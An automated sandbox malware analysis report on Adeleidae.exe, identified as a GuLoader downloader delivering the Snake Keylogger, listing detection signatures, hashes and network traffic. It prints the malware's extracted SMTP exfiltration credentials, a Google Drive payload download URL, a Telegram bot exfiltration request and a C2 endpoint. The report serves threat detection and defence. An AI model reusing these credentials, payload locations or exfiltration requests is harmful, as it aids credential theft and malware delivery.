Windows Analysis Report
Adeleidae.exe

Overview

General Information

Sample name: Adeleidae.exe
Analysis ID: 1540728
MD5: 9f3c578444b7f35f3d25eadd5695c162
SHA1: 4e06953078fc5119a5d0a13b8b62dd58bf81eac3
SHA256: d783f362c426661574a149a0bd801223273fe02c26b3d154de21fdb9516caf86
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Adeleidae.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe Avira: detection malicious, Label: HEUR/AGEN.1333748
Found malware configuration
Source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Adeleidae.exe ReversingLabs: Detection: 13%
Source: Adeleidae.exe Virustotal: Detection: 22% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF87A8 CryptUnprotectData, 6_2_27EF87A8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF8EF1 CryptUnprotectData, 6_2_27EF8EF1
Uses 32bit PE files
Source: Adeleidae.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49933 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: Adeleidae.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tem.Core.pdbt source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdbfu source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405846
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00406398 FindFirstFileW,FindClose, 0_2_00406398
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 02A8FC19h 6_2_02A8F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 02A8F45Dh 6_2_02A8F2C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 02A8F45Dh 6_2_02A8F4AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF9280h 6_2_27EF8FB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF7EB5h 6_2_27EF7B78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFD5D6h 6_2_27EFD308
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFBA76h 6_2_27EFB7A8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFFA56h 6_2_27EFF788
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF5A29h 6_2_27EF5780
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFDA66h 6_2_27EFD798
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF2A01h 6_2_27EF2758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF79C9h 6_2_27EF7720
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF5179h 6_2_27EF4ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF2151h 6_2_27EF1EA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFF136h 6_2_27EFEE68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFD146h 6_2_27EFCE78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF7119h 6_2_27EF6E70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF48C9h 6_2_27EF4620
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF18A1h 6_2_27EF15F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF0FF1h 6_2_27EF0D48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFE816h 6_2_27EFE548
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFC826h 6_2_27EFC558
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF6733h 6_2_27EF6488
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF0741h 6_2_27EF0498
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF3709h 6_2_27EF3460
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFDEF6h 6_2_27EFDC28
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFBF06h 6_2_27EFBC38
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF5E81h 6_2_27EF5BD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF2E59h 6_2_27EF2BB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF55D1h 6_2_27EF5328
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF25A9h 6_2_27EF2300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFB5E6h 6_2_27EFB318
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFF5C6h 6_2_27EFF2F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF7571h 6_2_27EF72C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF4D21h 6_2_27EF4A78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF1CF9h 6_2_27EF1A50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF6CC1h 6_2_27EF6A18
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFCCB6h 6_2_27EFC9E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov esp, ebp 6_2_27EFB1C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFECA6h 6_2_27EFE9D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF1449h 6_2_27EF11A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF0B99h 6_2_27EF08F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFC396h 6_2_27EFC0C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EFE386h 6_2_27EFE0B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov esp, ebp 6_2_27EFB081
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF02E9h 6_2_27EF0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF62D9h 6_2_27EF6030
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 27EF32B1h 6_2_27EF3008

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:50022 -> 213.165.67.102:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 213.165.67.102 213.165.67.102
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49945 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49961 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49918 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50001 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49877 -> 142.250.185.78:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49967 -> 188.114.96.3:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.4:50022 -> 213.165.67.102:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49933 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: msiexec.exe, 00000006.00000003.2536801654.0000000009EF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google. equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: smtp.ionos.es
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 24 Oct 2024 01:41:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.geotrust.com/GeoTrustTLSRSACAG1.crt0
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cdp.geotrust.com/GeoTrustTLSRSACAG1.crl0v
Source: powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: Adeleidae.exe, 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Adeleidae.exe, 00000000.00000000.1748229862.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
